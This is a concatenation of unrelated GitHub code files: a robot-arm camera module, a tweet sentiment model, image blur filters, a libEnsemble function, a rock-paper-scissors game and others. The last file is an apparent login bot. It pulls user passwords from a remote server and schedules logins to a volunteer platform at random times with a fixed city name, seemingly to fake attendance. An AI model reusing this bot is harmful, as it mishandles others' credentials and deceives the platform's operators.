(0, 897.203, 381.419), (0, 0, 1)]) # factory\n self.intrinsic_inverse = np.linalg.inv(self.intrinsic_matrix)\n #self.intrinsic_matrix = np.array([(905.8, 0, 668.8), (0, 911.7, 376.8), (0, 0, 1)]) # calibrated\n #self.intrinsic_matrix = np.array([(913.4, 0, 673.0), (0, 917.4, 377.7), (0, 0, 1)]) # calibrated\n self.extrinsic_matrix = np.eye(4)\n self.extrinsic_inverse = np.eye(4)\n self.homography_matrix = np.eye(3)\n\n self.last_click = np.array([0, 0])\n self.new_click = False\n self.rgb_click_points = np.zeros((5, 2), int)\n self.depth_click_points = np.zeros((5, 2), int)\n self.grid_x_points = np.arange(-450, 500, 50)\n self.grid_y_points = np.arange(-175, 525, 50)\n self.grid_points = np.array(np.meshgrid(self.grid_x_points, self.grid_y_points))\n self.grid_points = np.concatenate((self.grid_points, np.zeros_like(self.grid_points[0,:,:]).reshape(1,14,19)), axis = 0)\n self.grid_points = np.concatenate((self.grid_points, np.ones_like(self.grid_points[0,:,:]).reshape(1,14,19)), axis = 0)\n \n self.grid_points2 = np.array([np.ravel(self.grid_points[0,:,:]), np.ravel(self.grid_points[1,:,:]), \n np.ravel(self.grid_points[2,:,:]), np.ravel(self.grid_points[3,:,:])])\n\n self.z_offset = -13 # amount to add to all z measurements before calibration\n self.z_b = 8.75 # z = my + b, where y is y world value\n self.z_m = -0.04\n # b was 6.75\n # m was -0.05\n \n \n\n self.tag_detections = np.array([])\n self.tag_locations = [[-250, -25], [250, -25], [250, 275]]\n \"\"\" block info \"\"\"\n self.block_contours = np.array([])\n self.block_detections = np.array([])\n\n self.red_threshold = np.array([[165,2], [80,255], [20,255]], dtype= np.float32)\n self.orange_threshold = np.array([[3,14], [120,255], [47,255]], dtype= np.float32)\n self.yellow_threshold = np.array([[21,27], [158, 255], [50, 255]], dtype= np.float32)\n self.green_threshold = np.array([[65, 88], [100,255], [53, 255]], dtype= np.float32)\n self.blue_threshold = np.array([[100, 109], 
[151, 255], [52,255]], dtype= np.float32)\n self.purple_threshold = np.array([[110, 157], [45, 255], [25,255]], dtype= np.float32)\n # (color_str, color_BGR, color_threshold)\n self.colors = [(\"red\", (255, 0, 0), self.red_threshold, 0), \n (\"orange\", (255, 165, 0), self.orange_threshold, 1), \n (\"yellow\", (255, 255, 0), self.yellow_threshold, 2), \n (\"green\", (0, 255, 0), self.green_threshold, 3), \n (\"blue\", (0,0,255), self.blue_threshold, 4), \n (\"purple\", (160, 32, 240), self.purple_threshold, 5)]\n\n self.xy_threshold = np.array([[-500, 500], [-10, 475], [-5000,5000]], dtype= np.float32) # note, no threshold on z, ((x_low, x_high),(y_low, y_high), (z_low, z_high))\n self.erosion_kernel_size = 1\n self.erosion_kernel_shape = 0 # 0 is rectangle\n self.dilation_kernel_size = 1\n self.dilation_kernel_shape = 0 # 0 is rectangle\n self.morphological_constraints = np.array([self.erosion_kernel_size, self.erosion_kernel_shape, self.dilation_kernel_size, self.dilation_kernel_shape])\n self.min_pixels_for_rectangle = 10\n self.contour_constraints = np.array([self.min_pixels_for_rectangle])\n\n # self.pixel_grid stores a [921600, 3, 1] array, where each position on axis 0 is a pizel location,\n # and each element on axis 1 is the u,v,1 values at that position\n self.pixel_grid = np.array(np.meshgrid(np.arange(0,1280,1), np.arange(0,720,1)))\n self.pixel_grid = self.pixel_grid.transpose(2,1,0)\n self.pixel_grid = self.pixel_grid.reshape(-1,2,1)\n self.pixel_grid = np.concatenate((self.pixel_grid, np.ones((921600, 1, 1))), axis = 1)\n\n self.world_correction_matrix = np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, self.z_m, 1, self.z_b]])\n\n self.position_image = np.zeros((720,1280,3))\n\n # detected block = [(x,y,z), theta, size_str, color_num]\n self.detected_blocks = []\n\n\n def pixel2World(self, pixel_coord):\n\n z = self.DepthFrameRaw[pixel_coord[1,0]][pixel_coord[0,0]] + self.z_offset\n camera_coord = np.ones([4,1])\n camera_coord[0:3,:] = np.dot((z),np.dot(self.intrinsic_inverse, pixel_coord)) \n world_coord = np.dot(self.extrinsic_inverse, camera_coord)\n world_coord[2,0] = world_coord[2,0] + self.z_m * world_coord[1,0] + self.z_b\n return world_coord\n\n\n def processVideoFrame(self):\n \"\"\"!\n @brief Process a video frame\n \"\"\"\n cv2.drawContours(self.VideoFrame, self.block_contours, -1,\n (255, 0, 255), 3)\n\n def ColorizeDepthFrame(self):\n \"\"\"!\n @brief Converts frame to colormaped formats in HSV and RGB\n \"\"\"\n self.DepthFrameHSV[..., 0] = self.DepthFrameRaw >> 1\n self.DepthFrameHSV[..., 1] = 0xFF\n self.DepthFrameHSV[..., 2] = 0x9F\n self.DepthFrameRGB = cv2.cvtColor(self.DepthFrameHSV,\n cv2.COLOR_HSV2RGB)\n\n def loadVideoFrame(self):\n \"\"\"!\n @brief Loads a video frame.\n \"\"\"\n self.VideoFrame = cv2.cvtColor(\n cv2.imread(\"data/rgb_image.png\", cv2.IMREAD_UNCHANGED),\n cv2.COLOR_BGR2RGB)\n\n def loadDepthFrame(self):\n \"\"\"!\n @brief Loads a depth frame.\n \"\"\"\n self.DepthFrameRaw = cv2.imread(\"data/raw_depth.png\",\n 0).astype(np.uint16)\n\n def convertQtVideoFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.VideoFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtGridFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.GridFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], 
frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtDetectionFrame(self):\n \"\"\"!\n @brief Converts frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.DetectionFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtDepthFrame(self):\n \"\"\"!\n @brief Converts colormaped depth frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n try:\n img = QImage(self.DepthFrameRGB, self.DepthFrameRGB.shape[1],\n self.DepthFrameRGB.shape[0], QImage.Format_RGB888)\n return img\n except:\n return None\n\n def convertQtTagImageFrame(self):\n \"\"\"!\n @brief Converts tag image frame to format suitable for Qt\n\n @return QImage\n \"\"\"\n\n try:\n frame = cv2.resize(self.TagImageFrame, (1280, 720))\n img = QImage(frame, frame.shape[1], frame.shape[0],\n QImage.Format_RGB888)\n return img\n except:\n return None\n\n def getAffineTransform(self, coord1, coord2):\n \"\"\"!\n @brief Find the affine matrix transform between 2 sets of corresponding coordinates.\n\n @param coord1 Points in coordinate frame 1\n @param coord2 Points in coordinate frame 2\n\n @return Affine transform between coordinates.\n \"\"\"\n pts1 = coord1[0:3].astype(np.float32)\n pts2 = coord2[0:3].astype(np.float32)\n print(cv2.getAffineTransform(pts1, pts2))\n return cv2.getAffineTransform(pts1, pts2)\n\n def loadCameraCalibration(self, file):\n \"\"\"!\n @brief Load camera intrinsic matrix from file.\n\n TODO: use this to load in any calibration files you need to\n\n @param file The file\n \"\"\"\n pass\n\n def blockDetector(self):\n \"\"\"!\n @brief Detect blocks from rgb\n\n TODO: Implement your block detector here. You will need to locate blocks in 3D space and put their XYZ\n locations in self.block_detections\n \"\"\"\n pass\n\n def detectBlocksInDepthImage(self):\n \"\"\"!\n @brief Detect blocks from depth\n\n TODO: Implement a blob detector to find blocks in the depth image\n \"\"\"\n pass\n\n def projectGridInRGBImage(self):\n \"\"\"!\n @brief projects\n\n TODO: Use the intrinsic and extrinsic matricies to project the gridpoints \n on the board into pixel coordinates. 
copy self.VideoFrame to self.GridFrame and\n and draw on self.GridFrame the grid intersection points from self.grid_points\n (hint: use the cv2.circle function to draw circles on the image)\n \"\"\"\n self.GridFrame = self.VideoFrame.copy()\n \n if self.camera_calibrated:\n\n \n #H = cv2.findAffine(edge_points_pixel[],remap_points_pixel)[0]\n \n\n grid_camera_coord = np.dot(self.extrinsic_matrix, self.grid_points2)\n z_camera_coord = grid_camera_coord[2,:]\n grid_pixel_coord = np.dot(self.intrinsic_matrix, grid_camera_coord[0:3,:])\n #print(grid_pixel_coord.shape)\n for i in range(np.shape(grid_pixel_coord)[1]):\n cv2.circle(self.GridFrame, (int(grid_pixel_coord[0,i]/z_camera_coord[i]), int(grid_pixel_coord[1,i]/z_camera_coord[i])), 3, (255,0,0), -1)\n\n self.GridFrame = cv2.warpPerspective(self.GridFrame, self.homography_matrix, (self.GridFrame.shape[1], self.GridFrame.shape[0]))\n\n def BlockDetection(self):\n #self.DetectionFrame = self.VideoFrame.copy()\n rgb_image = self.VideoFrame.copy()\n depth_image = self.DepthFrameRaw.copy()\n\n rgb_image, self.detected_blocks = DetectBlocks(rgb_image, depth_image, self)\n\n \n #self.DetectionFrame = cv2.bitwise_and(hsv_image, hsv_image, mask = image)\n #mask_image = np.stack((mask, np.zeros_like(mask), np.zeros_like(mask)), axis = 2)\n self.DetectionFrame = rgb_image\n\n\n \n\nclass ImageListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, data.encoding)\n except CvBridgeError as e:\n print(e)\n self.camera.VideoFrame = cv_image\n\n\nclass TagImageListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, data.encoding)\n except CvBridgeError as e:\n print(e)\n self.camera.TagImageFrame = cv_image\n\n\nclass TagDetectionListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.tag_sub = rospy.Subscriber(topic, AprilTagDetectionArray,\n self.callback)\n self.camera = camera\n\n def callback(self, data):\n self.camera.tag_detections = data\n #for detection in data.detections:\n #print(detection.id[0])\n #print(detection.pose.pose.pose.position)\n\n\nclass CameraInfoListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.tag_sub = rospy.Subscriber(topic, CameraInfo, self.callback)\n self.camera = camera\n\n def callback(self, data):\n self.camera.intrinsic_matrix = np.reshape(data.K, (3, 3))\n #print(self.camera.intrinsic_matrix)\n\n\nclass DepthListener:\n def __init__(self, topic, camera):\n self.topic = topic\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(topic, Image, self.callback)\n self.camera = camera\n\n def callback(self, data):\n try:\n cv_depth = self.bridge.imgmsg_to_cv2(data, data.encoding)\n #cv_depth = cv2.rotate(cv_depth, cv2.ROTATE_180)\n except CvBridgeError as e:\n print(e)\n self.camera.DepthFrameRaw = cv_depth\n #self.camera.DepthFrameRaw = self.camera.DepthFrameRaw/2\n self.camera.ColorizeDepthFrame()\n\n\nclass VideoThread(QThread):\n updateFrame = pyqtSignal(QImage, QImage, QImage, QImage, QImage)\n\n def __init__(self, camera, parent=None):\n QThread.__init__(self, parent=parent)\n self.camera = camera\n image_topic = \"/camera/color/image_raw\"\n depth_topic = 
\"/camera/aligned_depth_to_color/image_raw\"\n camera_info_topic = \"/camera/color/camera_info\"\n tag_image_topic = \"/tag_detections_image\"\n tag_detection_topic = \"/tag_detections\"\n image_listener = ImageListener(image_topic, self.camera)\n depth_listener = DepthListener(depth_topic, self.camera)\n tag_image_listener = TagImageListener(tag_image_topic, self.camera)\n camera_info_listener = CameraInfoListener(camera_info_topic,\n self.camera)\n tag_detection_listener = TagDetectionListener(tag_detection_topic,\n self.camera)\n\n def run(self):\n if __name__ == '__main__':\n cv2.namedWindow(\"Image window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Depth window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Tag window\", cv2.WINDOW_NORMAL)\n cv2.namedWindow(\"Grid window\", cv2.WINDOW_NORMAL)\n time.sleep(0.5)\n while True:\n rgb_frame = self.camera.convertQtVideoFrame()\n depth_frame = self.camera.convertQtDepthFrame()\n tag_frame = self.camera.convertQtTagImageFrame()\n self.camera.projectGridInRGBImage()\n grid_frame = self.camera.convertQtGridFrame()\n self.camera.BlockDetection()\n detection_frame = self.camera.convertQtDetectionFrame()\n if ((rgb_frame != None) & (depth_frame != None)):\n self.updateFrame.emit(\n rgb_frame, depth_frame, tag_frame, grid_frame, detection_frame)\n time.sleep(0.03)\n if __name__ == '__main__':\n cv2.imshow(\n \"Image window\",\n cv2.cvtColor(self.camera.VideoFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Depth window\", self.camera.DepthFrameRGB)\n cv2.imshow(\n \"Tag window\",\n cv2.cvtColor(self.camera.TagImageFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Grid window\",\n cv2.cvtColor(self.camera.GridFrame, cv2.COLOR_RGB2BGR))\n cv2.imshow(\"Detection window\",\n cv2.cvtColor(self.camera.DetectionFrame, cv2.COLOR_RGB2BGR))\n cv2.waitKey(3)\n time.sleep(0.03)\n\n\nif __name__ == '__main__':\n camera = Camera()\n videoThread = VideoThread(camera)\n videoThread.start()\n rospy.init_node('realsense_viewer', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n","repo_name":"joek5555/armlab-w-23","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":17303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18529368936","text":"import tqdm\nfrom collections import defaultdict\nimport keras\nimport sklearn.utils.class_weight\nimport numpy as np\nimport pandas as pd\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Bidirectional\nfrom keras.layers import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import SpatialDropout1D\nfrom keras.layers import GlobalAveragePooling1D\nfrom keras.layers import Activation\nfrom keras.layers import Conv1D\nfrom keras.callbacks import Callback\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.metrics import f1_score, recall_score, precision_score\nimport re\nfrom keras import backend as K\nimport os\n\n\nscript_dirpath = os.path.dirname(os.path.abspath(__file__))\nTRAIN_CSV_FILEPATH = os.path.join(script_dirpath, r'data\\train.csv')\nTEST_CSV_FILEPATH = os.path.join(script_dirpath, r'data\\test.csv')\nTEST_CSV_FILEPATH_OUT = os.path.join(script_dirpath, r'data\\test_out.csv')\nMODEL_FILEPATH = os.path.join(script_dirpath, r'model.h5')\nVOCAB_SIZE = 
10000\nBATCH_SIZE = 64\n\n\ndef hashtag_split_func(x):\n return \" \".join([a for a in re.split(r'([A-Z][a-z]+)', x.group(1)) if a])\n\n\n# string manipulation that removes links, breaks hashtags lower case etc\ndef preprocess_data(data_raw):\n data = data_raw\n # split hashtags\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[#|@](\\w+)', hashtag_split_func, x))(data[:, 1])\n # make lower case\n data[:, 1] = np.vectorize(lambda x: x.lower())(data[:, 1])\n # remove links\n data[:, 1] = np.vectorize(lambda x: re.sub(r'http\\S+', '', x))(data[:, 1])\n data[:, 1] = np.vectorize(lambda x: re.sub(r'\\S+://\\S+', '', x))(data[:, 1])\n # remove non alpha-numeric and space-like\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[^0-9a-zA-Z\\s\\']', '', x))(data[:, 1])\n # replace space-like with spaces\n data[:, 1] = np.vectorize(lambda x: re.sub(r'[\\s]+', ' ', x))(data[:, 1])\n # remove start and end single quotes\n data[:, 1] = np.vectorize(lambda x: re.sub(r'(^|\\s)\\'?([\\w\\']+\\w+)\\'?', r'\\1\\2', x))(data[:, 1])\n # strip\n data[:, 1] = np.vectorize(lambda x: x.strip())(data[:, 1])\n\n # remove empty text rows, commented because of the test CSV filling requirement\n # data = data[np.vectorize(lambda x: len(x) > 0)(data[:, 1]), :]\n return data\n\n\n# used to print F1 recall and precision while training, not used for early stop\nclass Metrics(Callback):\n def on_epoch_end(self, batch, logs={}):\n predict = np.argmax(np.asarray(self.model.predict(self.validation_data[0])), axis=1)\n targ = np.argmax(self.validation_data[1], axis=1)\n print('val_f1 %.3f' % f1_score(targ, predict))\n print('val_recall %.3f' % recall_score(targ, predict))\n print('val_precision %.3f' % precision_score(targ, predict))\n return\n\n\n# loads the trained network, loads test csv, predict label and saves csv file with predicted labels\ndef predict_test(tokenizer, max_words_in_tweets):\n csv = pd.read_csv(TEST_CSV_FILEPATH)\n test_data_raw = csv.values\n test_data = preprocess_data(test_data_raw)\n X_test = tokenizer.texts_to_sequences(test_data[:, 1])\n X_test = pad_sequences(X_test, max_words_in_tweets)\n model = keras.models.load_model(MODEL_FILEPATH)\n predictions_categorical = model.predict(X_test)\n predictions = np.argmax(predictions_categorical, axis=1)\n csv['label'] = predictions\n csv.to_csv(TEST_CSV_FILEPATH_OUT)\n\n\ndef build_model(input_length):\n # TODO: use glove embedding\n # TODO: pretrain the net as a LM\n model = Sequential()\n model.add(Embedding(VOCAB_SIZE, 300, input_length=input_length))\n model.add(SpatialDropout1D(0.5))\n # model.add(LSTM(100, dropout=0.3, recurrent_dropout=0.3))\n # model.add(Dense(2, activation='softmax'))\n\n model.add(Bidirectional(LSTM(200, return_sequences=True, dropout=0.5, recurrent_dropout=0.5)))\n model.add(LSTM(200, return_sequences=True, dropout=0.5, recurrent_dropout=0.5))\n model.add(Conv1D(filters=2, kernel_size=1, activation='relu'))\n model.add(GlobalAveragePooling1D())\n model.add(Activation(activation='softmax'))\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n return model\n\n\n# prints the n most significant words, scored by the word's contribution to the 1 probability minus\n# the contribution to the 0 probability, just before the GAP layer is done.\ndef get_significant_words(X, tokenizer, n=100):\n model = keras.models.load_model(MODEL_FILEPATH)\n word_to_score = defaultdict(list)\n post_conv1d_func = K.function([model.input, K.learning_phase()], [model.layers[-3].output])\n # inverse tokenizer words dictionary, now 
maps index -> word\n ind_to_word = {index: word for word, index in tokenizer.word_index.items()}\n # this is the padding \\ out of vocabulary word\n ind_to_word[0] = 'N/A'\n for t in tqdm.tqdm(range(X.shape[0] // BATCH_SIZE)):\n start = t * BATCH_SIZE\n end = min((t + 1) * BATCH_SIZE, X.shape[0])\n seqs = X[start:end, :]\n # the output is shape is timesteps x 2\n out = post_conv1d_func([seqs, 0.0])[0]\n # the word's score is the contribution to the 1 probability minus the contribution to 0\n scores = out[:, :, 1] - out[:, :, 0]\n for i in range(seqs.shape[0]):\n for j in range(seqs.shape[1]):\n word = ind_to_word[seqs[i, j]]\n word_to_score[word].append(scores[i, j])\n word_to_avg_score = {word: np.mean(score_list) for word, score_list in word_to_score.items()}\n # sorts the words by their average scores, high score means big contribution\n sorted_word_avg_score = sorted(word_to_avg_score.items(), key=lambda x: x[1])\n return sorted_word_avg_score[-n:]\n\n\ndef main():\n train_val_data_raw = pd.read_csv(TRAIN_CSV_FILEPATH).values\n train_val_data = preprocess_data(train_val_data_raw)\n\n print('Negatives: %d' % train_val_data[train_val_data[:, 2] == 0].size)\n print('Positives: %d' % train_val_data[train_val_data[:, 2] == 1].size)\n print('Baseline accuracy: %.3f' % (train_val_data[train_val_data[:, 2] == 0].size / train_val_data.size))\n\n tokenizer = Tokenizer(num_words=VOCAB_SIZE, split=' ')\n tokenizer.fit_on_texts(train_val_data[:, 1])\n\n X = tokenizer.texts_to_sequences(train_val_data[:, 1])\n X = pad_sequences(X)\n Y = to_categorical(train_val_data[:, 2])\n sequence_words_amount = X.shape[1]\n\n model = build_model(sequence_words_amount)\n # class_weight used to balance type I and type II errors due to imbalanced dataset\n class_weight = sklearn.utils.class_weight.compute_class_weight('balanced',\n np.unique(train_val_data[:, 2]),\n train_val_data[:, 2])\n callbacks = [EarlyStopping(patience=2),\n ModelCheckpoint(MODEL_FILEPATH, save_best_only=True),\n Metrics()]\n model.fit(X, Y,\n validation_split=0.25,\n epochs=50,\n batch_size=BATCH_SIZE,\n callbacks=callbacks,\n class_weight=class_weight)\n predict_test(tokenizer, sequence_words_amount)\n print(get_significant_words(X, tokenizer))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"David-Taub/TweetsSentimentAnalysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42290235863","text":"for _ in range(int(input())):\n s = input()\n l = len(s)\n\n one=-1;zero=-1\n for i in range(l):\n if s[i]=='0' and zero==-1:\n zero=i\n if s[i]=='1' and one==-1:\n one=i\n\n if one==-1:\n print('0'*(2*l))\n elif zero==-1:\n print('1'*(2*l))\n elif one 1 增加一圈\n# filter size= 5-> 2 增加二圈 以此類推\n\nimg_len,img_width,img_channels=img.shape\n\ny=np.zeros([img_len+(extend_size*2),img_width+(extend_size*2),img_channels],dtype=\"uint8\") #增加兩圈 陣列上下左右增加2倍\n\nfor channel in range(img_channels):\n for i in range(extend_size,img_len+extend_size):\n for j in range(extend_size,img_width+extend_size): # 把圖片放進四周圍pixel值為0中\n y[i][j][channel]=img[i-extend_size][j-extend_size][channel]\n\n\n#卷積運算\ndef average_blur(img,filter_size):\n img_len,img_width,img_channels=img.shape\n convolution=np.ones([filter_size,filter_size,img_channels])\n for channel in range(img_channels):\n for i in range(img_len):\n for j in range(img_width):\n temp=0\n for filter_X in range(filter_size):\n for filter_Y in range(filter_size):\n 
temp=temp+y[i+filter_X][j+filter_Y][channel]*convolution[filter_X][filter_Y][channel]\n img[i][j][channel]=round(temp/(filter_size*filter_size))\n\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"self_average_blur\",img)\n cv2.waitKey()\n\n#找中位數\ndef median_blur(img,filter_size):\n img_len,img_width,img_channels=img.shape\n for channel in range(img_channels):\n for i in range(img_len):\n for j in range(img_width):\n temp=[]\n for filter_X in range(filter_size):\n for filter_Y in range(filter_size):\n temp.append(y[i+filter_X][j+filter_Y][channel])\n temp.sort() #把filter內的數字排列之後\n half=int(len(temp)/2)#找index一半的元素\n img[i][j][channel]=temp[half]\n\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"self_median_blur\",img)\n cv2.waitKey()\n\ndef gaussian_blur(img,filter_size):\n\n blur = cv2.GaussianBlur(img, (filter_size, filter_size),0)\n signature=cv2.imread(\"C:/Users/user/Desktop/imageprocess/HW1/signature_me.png\")\n signature_x,signature_y,signature_channels=signature.shape\n for channel in range(signature_channels):\n for i in range(signature_x):\n for j in range(signature_y):\n if signature[i][j][channel]==0:#如果簽名檔為黑 則self_blur同位置也是黑的\n img[i][j][channel]=0\n cv2.imshow(\"gaussian_blur\",img)\n cv2.waitKey()\n\n\n\naverage_blur(img,filter_size)\nmedian_blur(img,filter_size)\ngaussian_blur(img,filter_size)","repo_name":"d0641798/image-process","sub_path":"HW1/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21525727659","text":"import csv\n\n\ndef main():\n with open('some.csv', 'r', newline='') as f:\n reader = csv.reader(f)\n next(reader) # pass the first line\n for row in reader:\n print(row)\n\n\nif __name__ == '__main__':\n main()\n\n# https://stackoverflow.com/questions/11349333/when-processing-csv-data-how-do-i-ignore-the-first-line-of-data\n","repo_name":"binderclip/code-snippets-python","sub_path":"builtin_packages/csv_sp/reader_sp.py","file_name":"reader_sp.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"3"} +{"seq_id":"21182088311","text":"\"\"\"\nExample sim_f for simple heFFTe use case.\n\"\"\"\nimport subprocess\n\nimport numpy as np\n\n\ndef call_and_process_heffte(H, persis_info, sim_specs, _):\n \"\"\"\n Evaluates (via subprocess) a string that includes a call to a heFFTe\n executable as well as other arguments. 
Afterwards, the stdout is parsed to\n collect the run time (as reported by heFTTe)\n \"\"\"\n\n H_o = np.zeros(1, dtype=sim_specs[\"out\"])\n\n p = subprocess.run(H[\"exec_and_args\"][0].split(\" \"), cwd=\"./\", stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\n assert p.returncode == 0, \"heFFTe call has failed\"\n\n time = float(p.stdout.decode().split(\"Time per run: \")[1].split(\" \")[0])\n\n H_o[\"RUN_TIME\"] = time\n return H_o, persis_info\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/sim_funcs/heffte.py","file_name":"heffte.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"72540490961","text":"from rock_paper_scissors.constants import PAPER, ROCK, SCISSORS\n\n# Rock\nrock_art = (\" ___ \\n\"\n \"---' __) \\n\"\n \" (___) \\n\"\n \" (___) \\n\"\n \" (__) \\n\"\n \"---._(__) \")\n# Paper\npaper_art = (\" ___ \\n\"\n \"---' _)_ \\n\"\n \" __) \\n\"\n \" ___) \\n\"\n \" ___) \\n\"\n \"---.____) \")\n# Scissors\nscissorss_art = (\" ___ \\n\"\n \"---' _)_ \\n\"\n \" __) \\n\"\n \" ____) \\n\"\n \" (__) \\n\"\n \"---._(__) \")\n\nhand_name_to_ascii_art = {ROCK: rock_art, PAPER: paper_art, SCISSORS: scissors_art}\n\n\ndef reverse_hand(hand_ascii):\n new_lines = []\n for line in hand_ascii.split(\"\\n\"):\n\n new_line = line[::-1]\n new_line = new_line.replace(\"(\", \")\")\n new_line = new_line.replace(\")\", \"(\")\n new_lines.append(new_line)\n reversed_hand = \"\\n\".join(new_lines)\n return reversed_hand\n\n\ndef plot_round_graphics(player1, player2):\n hand1_art = hand_name_to_ascii_art[player1.currently_played_hand.hand_type]\n hand2_art = hand_name_to_ascii_art[player2.currently_played_hand.hand_type]\n hand2_art = reverse_hand(hand2_art)\n round_plot = player1.player_name + \" \" * 32 + player2.player_name + \"\\n\"\n for line1, line2 in zip(hand1_art.split(\"\\n\"), hand2_art.split(\"\\n\")):\n round_line = line1 + \" \" * 12 + line2 + \"\\n\"\n round_plot += round_line\n return round_plot\n","repo_name":"zaza-dh/rock_paper_scissors_example","sub_path":"rock_paper_scissors/graphical_helpers.py","file_name":"graphical_helpers.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33474000271","text":"#!/usr/bin/python3\nimport schedule\nimport time\nimport requests\nimport socket\nimport rsa\nimport base64\nimport random\nimport json\nimport os\nimport sys\n\nos.environ[\"REQUESTS_CA_BUNDLE\"] = os.path.join(os.path.dirname(sys.argv[0]), 'cacert.pem')\n\nyongdao_url = \"https://we.chinaedu.net/volbeacon\"\napi_url = \"http://39.105.22.135:8000\"\ntask_dict = {}\n# 任务列表,保存每天的登录任务\njob_list = []\n\ndef _str2key(s):\n # 对字符串解码\n b_str = base64.b64decode(s)\n\n if len(b_str) < 162:\n return False\n\n hex_str = ''\n\n # 按位转换成16进制\n for x in b_str:\n h = hex(x)[2:]\n h = h.rjust(2, '0')\n hex_str += h\n\n # 找到模数和指数的开头结束位置\n m_start = 29 * 2\n e_start = 159 * 2\n m_len = 128 * 2\n e_len = 3 * 2\n\n modulus = hex_str[m_start:m_start + m_len]\n exponent = hex_str[e_start:e_start + e_len]\n\n return modulus, exponent\n\n\n# 加密\ndef rsa_encrypt(s, pubkey_str):\n key = _str2key(pubkey_str)\n modulus = int(key[0], 16)\n exponent = int(key[1], 16)\n pubkey = rsa.PublicKey(modulus, exponent)\n return base64.b64encode(rsa.encrypt(s.encode(), pubkey)).decode()\n\n\n# 登录\ndef login(login_id, password_encryption, user_name):\n url = \"/login/login.do?execute=1\"\n data = {\n 
\"loginType\": (None, 1),\n \"type\": (None, 1),\n \"administrativeCode\": (None, 210200),\n \"ip\": (None, ip),\n \"cityName\": (None, \"辽宁省大连市\"),\n \"abc\": (None, user_name),\n \"loginId\": (None, login_id),\n \"passwordEncryption\": (None, password_encryption)\n }\n res = requests.post(yongdao_url + url, files=data)\n if res.status_code == 200:\n print(user_name + \" 登录成功!\")\n\n\n# 获取公钥\ndef login_encrypt(task_time):\n url = \"/common/loginEncrypt.do\"\n res = requests.post(yongdao_url + url)\n public_rsa_key = res.json()['publicRSAKey']\n login_id = res.json()['loginId']\n user = task_dict[task_time]\n password_encryption = rsa_encrypt(user[\"password\"], public_rsa_key)\n # print(user[\"password\"])\n user_name = user[\"studentName\"]\n login(login_id, password_encryption, user_name)\n\n\n# 获取ip\nhostname = socket.gethostname()\nip = socket.gethostbyname(hostname)\n\n\n# 随机时间\ndef round_time():\n h = random.randint(10, 11)\n m = random.randint(0, 59)\n task_time = str(h).zfill(2) + \":\" + str(m).zfill(2)\n return 